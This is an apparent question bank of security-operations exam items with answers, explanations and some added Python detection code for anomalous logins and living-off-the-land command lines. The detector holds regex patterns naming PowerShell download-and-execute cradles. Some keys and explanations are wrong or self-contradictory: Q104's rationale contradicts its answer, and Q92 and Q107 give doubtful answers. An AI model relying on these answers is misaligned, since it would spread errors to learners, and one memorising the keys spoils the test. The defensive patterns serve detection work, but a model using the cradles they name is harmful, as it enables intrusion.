CCNA Casp Security Operations Questions

72 of 147 questions · Page 2/2 · Casp Security Operations topic

76 · Multi-Select · hard

A threat intelligence analyst is profiling a threat actor that has been targeting the energy sector. Which THREE of the following attributes are most important to include in a threat actor profile? Select THREE.

Select 3 answers
A. Vulnerabilities exploited (CVEs)
B. Motivations and objectives
C. Targeted industries and regions
D. Tactics, Techniques, and Procedures (TTPs)
E. List of known indicators of compromise (IOCs)
Answers: B, C, D

Understanding why they attack helps predict future behavior.

Why this answer

Key attributes include motivations (e.g., espionage), TTPs (tactics, techniques, procedures), and targeted sectors. IOCs and CVEs are important but may change frequently; motivations, TTPs, and sectors are more stable.

77 · MCQ · medium

An organization is deploying deception technology to detect lateral movement by attackers. Which of the following would be the most effective to detect an attacker who has gained access to the internal network and is attempting to move to a sensitive server?

A. A honeytoken in the form of a fake password file on a file server
B. A network-based intrusion detection system (NIDS) on the segment
C. A honeypot configured to mimic a high-value database server
D. An endpoint detection and response (EDR) agent on all workstations
Answer: A

Honeytokens like fake credentials are effective because they trigger alerts when an attacker attempts to use them for authentication.

Why this answer

Honeytokens are deceptive data (e.g., fake credentials) placed on systems; if an attacker uses them, it triggers an alert. This is effective for detecting lateral movement without requiring interaction with a full honeypot.

78 · MCQ · medium

A SOC analyst is investigating an alert from the EDR system indicating that a user's workstation made multiple failed login attempts to a sensitive server, followed by a successful login from an unusual IP address. The analyst suspects a brute force attack. Which type of threat hunting methodology is being used?

A. Hypothesis-driven hunting
B. TTP-driven hunting
C. IoC-driven hunting
D. Baseline-driven hunting
Answer: A

The analyst formed a hypothesis based on an alert and is investigating.

Why this answer

This is hypothesis-driven threat hunting, as the analyst starts with a hypothesis (brute force attack) and then searches for evidence to confirm or deny it based on the alert.

79 · MCQ · easy

During a security incident, the incident response team has identified the root cause and removed the threat from all affected systems. Which phase of the incident response lifecycle involves returning systems to normal operation and monitoring for any signs of recurrence?

A. Eradication
B. Containment
C. Recovery
D. Lessons Learned
Answer: C

Recovery restores systems and monitors for recurrence.

Why this answer

The incident response lifecycle includes preparation, detection, containment, eradication, recovery, and lessons learned. Recovery is the phase where systems are restored to normal operation and monitoring is implemented to ensure the threat does not return.

80 · MCQ · medium

A security operations center (SOC) analyst is investigating a potential malware infection on a workstation. The analyst wants to perform static analysis on a suspicious executable. Which tool or technique is most appropriate for examining the executable without executing it?

A. Run the executable in a sandbox
B. Use a memory forensics tool like Volatility
C. Use the strings command to extract readable ASCII and Unicode strings
D. Perform a network traffic capture
Answer: C

Strings is a common static analysis tool for extracting embedded text from binaries.

Why this answer

Static analysis involves examining the file without running it. Using a disassembler like IDA Pro or a tool to view strings and PE headers is typical. The strings utility extracts readable text from the binary, which can reveal clues about its functionality.

81 · MCQ · medium

A security analyst is tuning the SIEM and wants to create a correlation rule that detects potential lateral movement using pass-the-hash attacks. Which log sources are most essential for detecting this technique?

A. DNS logs and web proxy logs
B. Windows Security Event Logs (4624) and network flow logs
C. Application logs and antivirus logs
D. DHCP logs and VPN logs
Answer: B

These logs show authentication attempts and network connections.

Why this answer

Pass-the-hash activity shows up in Windows authentication logs (Event ID 4624) and in network logs as unusual remote connections, so Windows Security Event Logs and network flow logs are the key sources.

82 · MCQ · hard

A SOC analyst is investigating a suspicious process that is making outbound connections to an unknown IP address. The analyst wants to examine the process memory for injected code. Which Volatility plugin is most appropriate for detecting code injection by listing all Virtual Address Descriptors (VADs) that are mapped as executable and writable?

A. netscan
B. malfind
C. pslist
D. dlllist
Answer: B

malfind detects injected code by examining VADs.

Why this answer

Volatility's 'malfind' plugin scans VADs and looks for executable and writable pages that may indicate injected code. It is commonly used for detecting code injection.

83 · MCQ · easy

Which of the following is the primary advantage of using STIX and TAXII for threat intelligence sharing?

A. They replace the need for a SIEM system
B. They perform dynamic analysis of malware samples
C. They provide real-time blocking of malicious IPs
D. They allow automated sharing of threat intelligence in a standardized format
Answer: D

Standardization and automation are key benefits.

Why this answer

STIX (Structured Threat Information Expression) and TAXII (Trusted Automated Exchange of Intelligence Information) provide a standardized framework for representing and exchanging threat intelligence, enabling interoperability between different tools and organizations.

84 · MCQ · medium

A security team is evaluating an EDR solution. Which of the following capabilities is a primary differentiator between EDR and traditional antivirus?

A. Centralized policy management
B. File integrity monitoring
C. Signature-based detection of known malware
D. Behavioral analysis and detection
Answer: D

Behavioral analysis is a key EDR capability, allowing detection of novel threats.

Why this answer

EDR focuses on continuous monitoring and recording of endpoint activities, enabling detection of suspicious behaviors that may indicate an attack, even if no known signature exists. Traditional antivirus relies on signature-based detection. Behavior-based detection is a core EDR capability.

85 · MCQ · easy

An organization wants to deploy a technology that lures attackers into a controlled environment to observe their tactics, techniques, and procedures (TTPs). Which deception technology should the organization implement?

A. Honeytoken
B. EDR
C. Honeypot
D. SIEM
Answer: C

Honeypots are decoy systems that mimic real assets to lure attackers.

Why this answer

A honeypot is a decoy system designed to attract attackers and gather intelligence.

86 · MCQ · medium

A vulnerability scanner reports a critical vulnerability with a CVSS base score of 9.8 on a public-facing web server. However, the server has a compensating control: a Web Application Firewall (WAF) that blocks exploit attempts. How should the security team prioritize patching this vulnerability?

A. Schedule patching during the next maintenance window
B. Defer patching indefinitely since the WAF mitigates the risk
C. Immediately patch the vulnerability as soon as possible
D. Increase the WAF rule strictness and delay patching
Answer: C

Critical vulnerabilities require immediate patching despite compensating controls.

Why this answer

Compensating controls can reduce risk, but patching should still be prioritized for critical vulnerabilities even if compensating controls are in place, as controls can be bypassed.

87 · MCQ · medium

A threat hunter is looking for signs of a ransomware attack that encrypts files and drops a ransom note. The hunter decides to search for processes that have modified many files in a short period. Which threat hunting methodology is being used?

A. TTP-driven hunting
B. Hypothesis-driven hunting
C. Machine learning-driven hunting
D. IoC-driven hunting
Answer: B

The hunter forms a hypothesis about ransomware behavior and searches for it.

Why this answer

Hypothesis-driven hunting starts with a hypothesis about a threat and then searches for evidence. The hunter is hypothesizing about ransomware behavior.

88 · MCQ · medium

A penetration tester is performing a test against a web application. During active reconnaissance, the tester discovers that the application discloses version numbers in HTTP headers. Which phase of the penetration testing lifecycle does this activity belong to?

A. Reconnaissance
B. Post-exploitation
C. Exploitation
D. Reporting
Answer: A

Active reconnaissance is part of the reconnaissance phase, where the tester gathers information directly from the target.

Why this answer

Active reconnaissance involves directly interacting with the target to gather information, such as by sending probes and analyzing responses. Discovering version numbers via HTTP headers is a form of active reconnaissance because the tester is making requests and inferring information from the responses.

89 · MCQ · medium

A security analyst is reviewing a suspicious email reported by a user. The email contains an attachment named 'invoice.pdf.exe'. Which type of malware analysis technique should the analyst perform first to determine if the file is malicious?

A. Reverse engineering
B. Static analysis
C. Dynamic analysis in a sandbox
D. Memory forensics
Answer: B

Static analysis is quick and safe to identify malicious characteristics without execution.

Why this answer

Static analysis (e.g., checking file extensions, strings, and hashes) is non-executing and safe to perform first to gather initial indicators.

90 · Multi-Select · hard

A security engineer is reviewing the results of a penetration test. The tester successfully exploited a vulnerability in a web application and escalated privileges to domain admin. Which THREE of the following findings should be included in the technical report to provide actionable remediation steps? (Select THREE.)

Select 3 answers
A. The estimated financial loss from the exploit
B. The recommendation to patch the web application
C. The exact command used to exploit the vulnerability
D. The name and contact of the penetration tester
E. The step-by-step path from initial access to domain admin
Answers: B, C, E

Actionable remediation is required in the technical findings.

Why this answer

The technical report should include specific recommendations (patch, input validation), evidence (command used), and impact (privilege escalation path). The business impact belongs in the executive summary.

91 · MCQ · medium

A vulnerability management team is prioritizing patches for a set of critical vulnerabilities. Vulnerability A has a CVSS base score of 9.8, vulnerability B has a CVSS base score of 7.5, and vulnerability C has a CVSS base score of 8.2. However, vulnerability B is actively being exploited in the wild, while the others are not. Which vulnerability should be patched first according to best practices?

A. All three should be patched simultaneously
B. Vulnerability B because it is actively exploited
C. Vulnerability C because it has a higher base score than B
D. Vulnerability A because it has the highest base score
Answer: B

Active exploitation increases the vulnerability's temporal score and priority.

Why this answer

While CVSS base score is important, temporal factors like active exploitation increase risk. Vulnerability B, despite a lower base score, is being exploited and thus poses a more immediate threat. Patching should prioritize actively exploited vulnerabilities.

92 · MCQ · hard

An analyst is examining a memory dump with Volatility and finds a suspicious process that has no parent process (parent PID 0). Which technique is the malware likely using to hide?

A. Rootkit
B. DLL injection
C. Process hollowing
D. WMI persistence
Answer: C

Process hollowing can result in a process with no parent.

Why this answer

Process hollowing replaces the memory of a legitimate process with malicious code. The parent PID 0 indicates that the process was spawned by the kernel, which can occur after hollowing.

93 · MCQ · easy

Which of the following is a key benefit of using an Extended Detection and Response (XDR) solution over traditional Endpoint Detection and Response (EDR)?

A. XDR only works with a single vendor's products
B. XDR eliminates the need for SIEM and SOAR systems
C. XDR only focuses on network traffic analysis
D. XDR provides centralized visibility across multiple security layers including endpoints, network, and cloud
Answer: D

XDR integrates data from various sources for holistic detection and response.

Why this answer

XDR extends detection beyond endpoints to include network, email, cloud, and other data sources, providing broader visibility and correlation across the entire environment.

94 · MCQ · easy

Which of the following is the primary purpose of a honeypot in a security operations environment?

A. To encrypt sensitive data at rest
B. To replace the need for traditional firewalls
C. To block malicious traffic at the network perimeter
D. To provide early detection of unauthorized activity
Answer: D

Honeypots detect attackers by luring them.

Why this answer

Honeypots are decoy systems designed to attract attackers, allowing security teams to observe their tactics, techniques, and procedures without risking real assets.

95 · MCQ · medium

A security analyst receives an alert from the SIEM indicating multiple failed logon attempts from an external IP address followed by a successful logon for a domain admin account. Which phase of the incident response lifecycle is the analyst currently in?

A. Lessons learned
B. Containment
C. Detection
D. Preparation
Answer: C

The alert is part of the detection phase where potential incidents are identified.

Why this answer

The detection phase involves identifying potential incidents through alerts and analysis. The analyst has received an alert and is likely investigating, which is part of detection.

96 · MCQ · medium

During a digital forensics investigation, an analyst needs to acquire the contents of RAM from a compromised server. Which order of volatility should the analyst follow?

A. Capture the swap file first, then RAM
B. Capture network connections first, then RAM
C. Capture the hard drive image first, then RAM
D. Capture RAM first, then the hard drive
Answer: D

RAM is the most volatile and should be collected first.

Why this answer

The order of volatility dictates collecting the most volatile data first. RAM is highly volatile and should be captured before less volatile data like disks.

97 · MCQ · medium

A SOC team is implementing a SOAR playbook to automate response to phishing emails reported by users. Which step should be included in the playbook to prevent other users from accessing the malicious link?

A. Isolate the reporter's workstation
B. Reset the reporter's password
C. Block the malicious URL in the web proxy
D. Delete the email from all mailboxes
Answer: C

Blocking the URL prevents access by all users.

Why this answer

URL blocking in a web proxy prevents other users from accessing the malicious link, which is a common automated response in phishing playbooks.

98 · MCQ · medium

An organization discovers a critical vulnerability in a legacy application that cannot be patched due to vendor end-of-life. Which of the following is the BEST compensating control to reduce risk?

A. Increase logging and monitoring
B. Apply a virtual patch using an intrusion prevention system (IPS)
C. Implement network segmentation to isolate the application
D. Decommission the application immediately
Answer: C

Segmentation limits exposure and protects the rest of the network.

Why this answer

Network segmentation isolates the vulnerable system, reducing the attack surface and limiting potential damage.

99 · MCQ · hard

A security analyst is investigating a malware sample and wants to determine its capabilities without executing it. The analyst examines the binary's imports, strings, and structure. What type of analysis is being performed?

A. Memory analysis
B. Static analysis
C. Reverse engineering
D. Dynamic analysis
Answer: B

Static analysis is performed without executing the file.

Why this answer

Static analysis examines the malware without executing it, focusing on file metadata, strings, imports, and other characteristics.

100 · Multi-Select · easy

A security analyst is reviewing CVSS scores for vulnerability prioritization. Which TWO of the following are component metric groups in CVSS v3?

Select 2 answers
A. Impact
B. Temporal
C. Exploitability
D. Environmental
E. Attack Vector
Answers: B, D

Temporal is one of the three metric groups.

Why this answer

CVSS v3 consists of Base, Temporal, and Environmental metric groups. Exploitability and Impact are sub-scores within the Base group, not separate groups.

101 · MCQ · medium

During a penetration test, the tester has gained initial access to a web server and wants to move laterally to a database server. Which of the following techniques would be most effective for identifying valid credentials that could be reused on the database server?

A. Running a port scan on the internal network
B. Deploying a web shell for persistent access
C. Conducting a SQL injection on the database server
D. Using Mimikatz to dump credentials from memory
Answer: D

Mimikatz extracts credentials that may be reused.

Why this answer

Mimikatz is a tool that extracts plaintext passwords, hashes, and Kerberos tickets from memory. It is commonly used for credential dumping to enable lateral movement.

102 · MCQ · medium

A security analyst is reviewing a suspicious process that has been identified on an endpoint. The analyst wants to determine if the process has any network connections and what data it might be sending. Which tool is most appropriate for analyzing the memory of the affected system to identify network connections and potential data exfiltration?

A. Wireshark
B. Volatility
C. Autopsy
D. Nmap
Answer: B

Volatility is used for memory forensics and can extract network connections and other runtime artifacts.

Why this answer

Volatility is a memory forensics tool that can analyze RAM dumps to extract network connections, processes, and other artifacts. It is the best choice for this task.

103 · MCQ · hard

A security analyst is analyzing a memory dump using Volatility. The analyst wants to list all running processes and identify any hidden processes. Which Volatility plugin should be used?

A. psxview
B. pslist
C. pstree
D. psscan
Answer: D

psscan scans for processes in memory pools and can detect hidden or terminated processes.

Why this answer

The pslist plugin walks the kernel's doubly linked list of active processes, while psscan uses pool tag scanning to find hidden processes that have been unlinked from that list.

104 · MCQ · medium

A penetration tester is performing a test against a web application. The rules of engagement prohibit any denial of service (DoS) attacks. Which of the following actions is most likely prohibited by this restriction?

A. Performing a SQL injection that deletes a table
B. Exploiting a file upload vulnerability to upload a web shell
C. Using a tool to send thousands of requests to overwhelm the server
D. Running a directory brute-force tool
Answer: C

Overwhelming the server is a DoS attack, explicitly prohibited.

Why this answer

A SQL injection that causes a database crash constitutes a denial of service, which is prohibited.

105 · Multi-Select · medium

A penetration tester is preparing for an engagement and must define the rules of engagement (ROE) with the client. Which TWO of the following should be included in the ROE? Select TWO.

Select 2 answers
A. Time window for testing (e.g., after hours)
B. Scope of testing (IP ranges and systems)
C. List of vulnerabilities to be tested
D. Testing credentials provided by the client
E. Vendor contact information
Answers: A, B

Specifies when testing can occur to minimize impact.

Why this answer

Rules of engagement should include scope (IP ranges, systems), limitations (what is off-limits), and authorization. Testing credentials and vulnerability details are not part of ROE.

106 · MCQ · easy

A security analyst is performing incident response and needs to collect evidence from a live system. Which of the following should be collected first to preserve volatile data?

A. Memory (RAM)
B. Network connections
C. Hard drive contents
D. System logs
Answer: A

Memory is the most volatile and must be captured first.

Why this answer

The order of volatility dictates that memory (RAM) is the most volatile and must be captured before any other evidence.

107 · MCQ · easy

A security analyst is investigating a potential malware infection on a user's workstation. The analyst wants to examine the file system for any suspicious files without altering the original data. Which forensic principle is the analyst following?

A. Chain of custody
B. Hashing
C. Order of volatility
D. Forensic imaging
Answer: A

Chain of custody documents the handling of evidence to maintain its integrity.

Why this answer

Preserving the chain of custody ensures that evidence is not tampered with and maintains its integrity for legal proceedings.

108 · MCQ · hard

A security analyst is investigating a potential advanced persistent threat (APT) that has evaded traditional signature-based defenses. The analyst hypothesizes that the attacker is using a specific technique from the MITRE ATT&CK framework: process injection. Which threat hunting methodology is most appropriate for this scenario?

A. TTP-driven hunting by analyzing adversary behaviors mapped to the ATT&CK framework
B. Hypothesis-driven hunting based on a specific technique (process injection) and searching for evidence in memory and process activity
C. Automated hunting using SIEM correlation rules that trigger on known malicious file hashes
D. IoC-driven hunting using known indicators of compromise from open-source feeds
Answer: B

Hypothesis-driven hunting starts with a hypothesis about adversary behavior and proactively searches for evidence, making it ideal for detecting novel or evasive techniques.

Why this answer

Hypothesis-driven hunting starts with a specific hypothesis based on threat intelligence or a known TTP, such as process injection. This approach is proactive and focuses on detecting behaviors consistent with the hypothesis, unlike IoC-driven hunting which relies on known indicators.

109 · MCQ · hard

A security analyst is using a SOAR platform to automate response to phishing emails reported by users. The playbook should perform the following actions in order: (1) extract indicators from the email, (2) query threat intelligence feeds for reputation, (3) if malicious, block the sender's domain at the email gateway and delete the email from all user inboxes. Which type of playbook step is most appropriate for step 3?

A. Playbook trigger
B. Output step
C. Action step
D. Conditional step
Answer: C

Action steps execute automated tasks such as API calls to block or delete.

Why this answer

In SOAR, an action step performs a specific operation like blocking a domain or deleting emails. Conditional steps would check conditions, but the playbook already determined the email is malicious, so an action is needed.

110 · MCQ · hard

A security team is analyzing a suspicious binary using static analysis. They run the strings command and observe references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique is the binary likely employing?

A. DLL sideloading
B. Reflective DLL loading
C. Process injection
D. API hooking
Answer: C

These API calls are typical of process injection techniques.

Why this answer

CreateRemoteThread and WriteProcessMemory are commonly used for process injection, allowing code execution in another process's address space.

111 · Multi-Select · easy

A penetration tester is planning a test for a client that has a critical web application. The rules of engagement specify that the tester must avoid causing a denial of service (DoS). Which THREE actions are appropriate for the tester to include in the scope? (Select THREE.)

Select 3 answers
A. Conducting social engineering attacks against employees without prior approval
B. Port scanning to identify open services on the web server
C. Performing a distributed denial-of-service (DDoS) attack to test resilience
D. Attempting to brute-force directories and files on the web server
E. Testing for SQL injection vulnerabilities in input fields
Answers: B, D, E

Port scanning is a standard reconnaissance technique that does not cause DoS.

Why this answer

Port scanning, SQL injection testing, and directory brute-forcing are common penetration testing activities that do not inherently cause DoS. DoS attacks and social engineering without approval are typically out of scope.

112 · MCQ · hard

A security operations center (SOC) analyst is tuning a SIEM correlation rule to detect a known attack pattern that involves multiple failed logins followed by a successful login from a different IP address. Which approach best reduces false positives while maintaining detection effectiveness?

A. Use User Behavior Analytics (UBA) to baseline normal login patterns
B. Create a rule that alerts on any failed login
C. Correlate only with known malicious IP addresses
D. Set a threshold of 10 failed logins within 5 minutes
Answer: A

UBA adapts to user behavior, reducing false positives.

Why this answer

UBA establishes a baseline of user behavior and flags deviations, reducing false positives from legitimate multiple failed logins (e.g., forgotten passwords) while still detecting anomalous patterns.

113 · MCQ · medium

During an incident response, a security analyst identifies a previously unknown malware variant. Which type of threat intelligence feed would provide the most timely and structured information about this threat?

A. STIX/TAXII feed
B. An ISAC
C. Open source intelligence (OSINT)
D. A commercial threat feed
Answer: A

STIX/TAXII provides structured, machine-readable threat intelligence.

Why this answer

STIX/TAXII enables sharing of structured threat intelligence in a standardized format, allowing for automated consumption and immediate updates.

114 · MCQ · hard

A security engineer is implementing deception technology to detect lateral movement by adversaries. Which type of deception resource would be MOST effective for capturing adversary credential harvesting activities on a network segment that contains no real domain controllers?

A. A SIEM correlation rule for anomalous logins
B. A network-based intrusion detection system (NIDS)
C. A honeypot configured as a domain controller
D. A honeytoken in the form of a fake service account password
Answer: D

Honeytokens are lightweight and trigger alerts when used.

Why this answer

A honeytoken (e.g., a fake credential file or a service account password) planted on a system can trigger an alert when an adversary attempts to use it. A fake domain controller honeypot is also effective but may require more resources. However, a honeytoken is specifically designed to be used by attackers and is simple to deploy.

115 · MCQ · medium

During a security incident, a SOC analyst identifies a process with a suspicious hash on several endpoints. The analyst wants to determine if this hash is known to be malicious by querying internal and external threat intelligence sources. Which standard should the analyst use to structure the threat intelligence data for automated sharing?

A. TAXII
B. STIX
C. OpenIOC
D. CybOX
Answer: B

STIX is the standard structured language for describing threat intelligence.

Why this answer

STIX (Structured Threat Information Expression) is a language for describing threat intelligence, often used in conjunction with TAXII for sharing. It structures data like indicators, observables, and campaigns.

116 · MCQ · easy

A security analyst is reviewing a SIEM alert that indicates a user's credentials were used to log in from two different countries within a span of 10 minutes. This is likely an indicator of what type of attack?

A. Brute-force attack
B. Man-in-the-middle attack
C. Credential theft and reuse
D. Pass-the-hash attack
Answer: C

The attacker is using stolen credentials from a different location.

Why this answer

A login from two distant locations in a short time suggests credential theft and reuse, which is characteristic of a credential stuffing or account takeover attack. The attacker likely obtained the credentials and is using them from a different location.

117 · MCQ · medium

A vulnerability has a CVSS base score of 9.8. The vulnerability is present on a server that is not exposed to the internet but is accessible to internal users with valid credentials. Which CVSS metric should be adjusted to reflect the reduced risk?

A. None, the base score should be used as-is
B. Temporal score
C. Environmental score
D. Base score
Answer: C

Environmental score adjusts for local context, such as access restrictions.

Why this answer

The Environmental Score allows customization based on specific organizational context, such as modified access requirements.

118 · Multi-Select · medium

A SOC team is implementing a SOAR playbook to automate the response to phishing emails reported by users. The playbook should perform initial triage and, if the email is determined to be malicious, take containment actions. Which TWO of the following actions should be included in the playbook? (Choose TWO.)

Select 2 answers
A. Send an alert to the user's manager for approval
B. Automatically create a ticket in the service desk system
C. Automatically block the sender's email address in the email gateway
D. Initiate a full antivirus scan on the user's workstation
E. Extract embedded URLs and file hashes for threat intelligence lookup
Answers: C, E

This is a containment action to prevent further emails from that sender.

Why this answer

Common phishing response playbooks include extracting URLs and hashes for analysis and automatically blocking the sender's email address. Creating a ticket is not a containment action, and scanning the user's machine may be part of eradication but not initial containment.

119 · Multi-Select · medium

A security analyst is investigating a potential data exfiltration incident. The analyst needs to preserve evidence for legal proceedings. Which two actions must the analyst take to maintain the chain of custody? (Select TWO).

Select 2 answers
A. Encrypt the evidence with a personal key
B. Share the evidence with all team members for analysis
C. Document every person who accesses the evidence and the time of access
D. Run antivirus scans on the evidence to ensure it is safe
E. Create a forensic image of the hard drive using a write-blocker
Answers: C, E

Chain of custody requires a record of evidence handling.

Why this answer

Documenting who handled the evidence and when, and creating a forensic image with a write-blocker, ensure the integrity and admissibility of the evidence.

120 · MCQ · easy

An organization is developing a SOAR playbook to handle phishing emails reported by users. Which of the following actions is most appropriate to automate in the first step of the playbook?

A. Block the sender's email address at the gateway
B. Remove the email from all user mailboxes
C. Scan the attachment in a sandbox
D. Send an alert to the SOC analyst for manual analysis
Answer: B

Removing the email from mailboxes is a containment action that limits further risk.

Why this answer

The first step in a phishing response playbook should isolate the potentially malicious email to prevent further exposure. Automating the removal of the email from all user mailboxes is a common initial containment action.

121 · MCQ · medium

During a penetration test, the tester has gained initial access to a system and wants to escalate privileges. Which of the following techniques is most likely to be effective for privilege escalation on a Windows system?

A.Using Mimikatz to extract plaintext passwords from memory
B.Exploiting a local privilege escalation vulnerability like CVE-2023-xxxx
C.Scanning for open ports on the network
D.Performing a phishing attack on the domain administrator
AnswerB

Local exploits elevate from a standard user to Administrator or SYSTEM.

Why this answer

Exploiting a kernel vulnerability or a misconfigured service (unquoted service path, weak permissions on a service binary) is the classic local privilege escalation path; token manipulation and DLL hijacking are alternatives, but a kernel exploit is the most direct. Mimikatz (A) needs SYSTEM or SeDebugPrivilege to read LSASS, so it is a credential theft step taken after escalation, not a way to achieve it. Port scanning (C) and phishing (D) do not raise privileges on the compromised host.

122
Multi-Selecthard

During a penetration test, the tester has gained initial access to a web server and wants to perform lateral movement to reach a database server. The tester enumerates the network and finds that the web server has two network interfaces: one connected to a DMZ and one to an internal network. The database server is on the internal network. Which TWO techniques could the tester use to pivot from the web server to the database server? (Choose TWO.)

Select 2 answers
A.Use SSH tunneling to create a local forward to the database server's port
B.Perform a SQL injection attack against the database server
C.Deploy a reverse shell from the web server to the tester's machine
D.Install a keylogger on the web server to capture database credentials
E.Use Metasploit's route add command to add a route to the internal subnet through the web server
AnswersA, E

SSH local port forwarding (ssh -L) exposes the internal database port on the tester's machine, tunnelled through the dual-homed web server.

Why this answer

Pivoting means using the compromised dual-homed host as a relay into the internal subnet, either by forwarding individual ports (SSH -L, or a dynamic SOCKS proxy with -D) or by telling the attack framework to route traffic for the internal subnet through the existing session (Metasploit's route command or the post/multi/manage/autoroute module). A reverse shell (C) re-establishes access to the web server itself; on its own it does not reach the internal network.

SQL injection (B) attacks the application layer and a keylogger (D) harvests credentials; neither moves the tester's traffic onto the internal subnet.

123
MCQmedium

A security analyst is reviewing CVSS scores for vulnerabilities in the environment. A vulnerability has a base score of 9.0, but the organization has a compensating control that reduces the likelihood of exploitation. The analyst adjusts the score to 6.0 for prioritization. Which CVSS metric group did the analyst modify?

A.Base
B.Vector
C.Environmental
D.Temporal
AnswerC

Environmental metrics tailor a base score to the local deployment: the modified base metrics (MAV, MAC, MPR, MUI, MS, MC, MI, MA) and the CR/IR/AR security requirements.

Why this answer

The Environmental group lets the organization re-express the base metrics for its own setting; a compensating control that makes exploitation harder is captured by modified metrics such as MAV (for example Adjacent once the host is segmented) or MAC. The Base group (A) describes the vulnerability itself and is never edited locally; Temporal (D) covers exploit maturity, remediation level and report confidence; "Vector" (B) is the string notation, not a metric group.

124
Multi-Selecthard

A security analyst is investigating a potential advanced persistent threat (APT) that has been evading traditional detection. The analyst decides to use User and Entity Behavior Analytics (UEBA) to identify anomalous activity. Which TWO of the following activities would be most indicative of a potential compromise when analyzed through UEBA? (Choose TWO.)

Select 2 answers
A.A service account authenticating to a database server every 5 minutes
B.A user logging in from a remote location at 3:00 AM, which is outside their normal working hours
C.A user accessing a large number of files on a file server that they do not normally access
D.A user connecting to the corporate VPN from a hotel during a business trip
E.An administrator running a scheduled antivirus scan on a server
AnswersB, C

Off-hours access is a common indicator of compromise.

Why this answer

UEBA learns each user's and service account's normal pattern and scores deviations from it. A 3:00 AM login from a remote location (B) and bulk access to files the user never touches (C) are classic deviations. A service account polling a database every 5 minutes (A) and an administrator's scheduled scan (E) are regular, machine-like patterns that become the baseline, and a VPN login from a hotel (D) matches the user's travel context.
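The baseline-and-deviation logic the explanation describes, as an added Python example (not from the question bank). The 30-day history and the three events under review are constructed to mirror options A, B, C and D: alice's 03:00 login and 400-file session deviate on both axes, while the service account and the travelling user stay inside their learned patterns:

```python
"""UEBA-style baseline and deviation scoring (added example, not from the page)."""
import statistics
from collections import defaultdict

# Constructed 30-day history: one record per login session with the hour of
# day and the number of distinct files touched in that session.
HISTORY = []
for day in range(30):
    HISTORY.append({"user": "alice", "hour": 8 + day % 10, "files": 20 + day % 11})  # 08:00-17:00
    HISTORY.append({"user": "bob", "hour": 9 + day % 8, "files": 15 + day % 7})      # travels often
    for hour in range(24):                                                           # polls all day
        HISTORY.append({"user": "svc_db", "hour": hour, "files": 1})

# Constructed events under review (options B+C, A and D respectively).
EVENTS = [
    {"user": "alice", "hour": 3, "files": 400},   # 03:00 login plus mass file access
    {"user": "svc_db", "hour": 2, "files": 1},    # the regular 5-minute poll
    {"user": "bob", "hour": 10, "files": 18},     # hotel VPN, normal hours and volume
]


def build_baseline(history):
    """Per entity: the set of hours ever seen and mean/stdev of files per session."""
    hours = defaultdict(set)
    files = defaultdict(list)
    for r in history:
        hours[r["user"]].add(r["hour"])
        files[r["user"]].append(r["files"])
    return {u: {"hours": hours[u],
                "mean": statistics.mean(files[u]),
                "stdev": statistics.pstdev(files[u])} for u in hours}


def score_event(event, baseline, z_threshold=3.0):
    """Return the deviations found for one event (empty list = consistent)."""
    b = baseline.get(event["user"])
    if b is None:
        return ["entity has no baseline"]
    findings = []
    if event["hour"] not in b["hours"]:
        findings.append(f"login at {event['hour']:02d}:00 outside observed hours")
    # A constant baseline (stdev 0) means any change is notable; avoid dividing by zero.
    spread = b["stdev"] if b["stdev"] > 0 else 1.0
    z = (event["files"] - b["mean"]) / spread
    if z > z_threshold:
        findings.append(f"file access volume {event['files']} is {z:.1f} sd above mean {b['mean']:.1f}")
    return findings


def review(events=EVENTS, history=HISTORY):
    baseline = build_baseline(history)
    return {e["user"]: score_event(e, baseline) for e in events}


if __name__ == "__main__":
    for user, findings in review().items():
        print(user, findings or "consistent with baseline")
```

Commercial UEBA adds peer-group comparison (is this volume normal for anyone in the same department?) and risk accumulation over time; the two checks here, an unseen hour and a z-score on volume, are the core of the same idea.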

125
Multi-Selecthard

A senior security architect is designing a detection strategy for advanced persistent threats (APTs) that employ living-off-the-land (LotL) techniques. Which THREE of the following approaches are most effective for detecting LotL activities? (Choose three.)

Select 3 answers
A.User and Entity Behavior Analytics (UEBA)
B.Deploying honeytokens and honeypots
C.Signature-based detection on malicious file hashes
D.Monitoring for native tool usage with EDR and logging command-line arguments
E.Blocking all scripts and macros by default
AnswersA, B, D

UEBA can establish baselines and detect deviations, such as an admin using PowerShell in an unusual way.

Why this answer

LotL attackers use tools that are already on the host (PowerShell, WMI, certutil, scheduled tasks), so there is no malicious binary to match and a file-hash signature (C) will not fire on a signed Microsoft binary. Behavioral analytics (A) can flag an account using native tools in a way it never has before, and deception (B) gives an attacker who is enumerating with legitimate tools something that only an attacker would touch.

EDR with full command-line logging (D) sees the traits that separate abuse from administration: an Office process spawning PowerShell, an encoded or hidden-window command, a script launched from a user-writable directory. Blocking all scripts and macros (E) breaks legitimate administration and is a prevention setting, not a detection approach.
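The command-line traits named in items 125 and 126 (encoded PowerShell, hidden windows, Office-spawned script hosts, certutil downloads, scripts from user-writable paths), as an added Python example that runs over constructed EDR process-creation events; it is not code from the question bank. The encoded command is built inside the block so the decoder has something real to unwrap, and 198.51.100.7 is a documentation address:

```python
"""Command-line analytics for living-off-the-land tradecraft
(added example, not from the page)."""
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE = re.compile(r"\\(Temp|AppData|Downloads|Public|ProgramData)\\", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b", re.I)


def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of the UTF-16LE script; return it as text, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Return the suspicious traits found in one process-creation event."""
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    findings = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append(f"{parent} spawned {image}")
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("encoded command: " + decoded)
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
            findings.append("hidden window")
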